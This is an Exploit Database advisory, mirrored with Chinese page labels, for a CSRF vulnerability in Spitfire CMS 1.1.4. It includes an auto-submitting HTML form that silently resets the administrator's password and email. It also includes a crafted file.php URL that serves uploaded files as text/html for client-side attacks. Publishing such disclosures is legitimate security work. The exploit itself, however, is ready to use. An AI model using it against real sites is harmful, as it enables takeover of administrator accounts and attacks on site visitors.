Spitfire CMS 1.1.4 – Cross-Site Request Forgery

• Exploit Database
• 49 阅读

• 作者： Yashar shahinzadeh
  日期： 2013-08-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/27601/

• ###################################################################################################################################
  # Exploit Title: spitefire CMS - CSRF / ADD / EDTI / UPLOAD FILE
  # Date: 2013 15 August
  # Exploit Author: Yashar shahinzadeh
  # Special thanks to Mormoroth
  # Credit goes for: http://y-shahinzadeh.ir & ha.cker.ir
  # Vendor Homepage: http://spitfire.clausmuus.de/
  # Tested on: Linux & Windows, PHP 5.2.9
  # Affected Version :1.1.4
  #
  # Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir }
  ###################################################################################################################################
  
  Summary:
  ========
  1. CSRF - Adding/Editing administrator account / UPLOAD FILE
  
  
  1. CSRF - Adding/Editing administrator account:
  ===============================================
  Spitefire cms ain't a well-coded CMS having many errors and low performance... It is not protected from CSRF as attackers are capable of adding/editing administrators account, or ever uploading a file through CSRF. I'm only giving example of chaning administrator's details:
  
  <html>
  	<body onload="submitForm()">
  	<form name="myForm" id="myForm"
  	action="http://localhost/spitfire_site/cms/edit/tpl_user_settings_action.php" method="post">
  	<input type="hidden" name="value[password]" value="arian123">
  	<input type="hidden" name="value[password2]" value="arian123">
  	<input type="hidden" name="value[email]" value="y.shahinzadeh@gmail.com">
  	<input type="hidden" name="action" value="save">
  	</form>
  	<script type='text/javascript'>document.myForm.submit();</script>
  </html>
  
  After issuing exploit, something like that may be appeared:
  status = {'values':{'id':'1','realname':'Administrator','username':'admin','password':'','groups':{'all':'7','1':'4'},'may_edit_users':'1','is_admin':'1','status':'0','is_ldap_user':'0','must_change_password':'','email':'admin@admin.net','language':'en'},'messages':{},'quickbar':{'disabledButtons':{'save':'1','redo':'1'}},'statusbar':{'value':' #1'}};
  
  I would expand on upload procedure, at the beginning of the installing site, the author is forced to give a writable directory for saving files, finding the given directory aint much difficult (default is /site/files/). The upload form doesn't have CSRF token so attacker can upload malicious file containing HTML/JAVA codes. The file will be renamed to a file without any extention after uploading, so only client side exploits and attacks can be conducted. Since file_get_contents() function executes file, the attacker must give the crafted URL which is similar to following URL:
  
  http://localhost/spitfire_site/cms/file.php?cms_id=4&name=logo&type=text/html
  
  text/html is the dangerous part because it's set image/gif as default.
  
  /** Yasshar shahinzadeh **/